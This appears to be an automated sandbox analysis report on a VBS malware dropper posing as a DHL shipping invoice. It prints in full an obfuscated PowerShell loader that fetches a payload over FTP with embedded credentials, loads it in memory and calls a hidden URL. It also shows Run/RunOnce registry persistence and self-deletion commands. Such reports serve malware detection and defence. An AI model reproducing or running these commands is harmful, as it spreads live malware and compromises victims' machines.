                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'

                    Persistence and Installation Behavior

                    barindex
                    Tries to download and execute files (via powershell)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00406EEB ShellExecuteW,URLDownloadToFileW,23_2_00406EEB

                    Boot Survival

                    barindex
                    Creates autostart registry keys with suspicious values (likely registry only malware)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhs cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exitJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exitJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exitJump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_zhsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdmJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdmJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdmJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_fdmJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Self deletion via cmd or bat file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,23_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
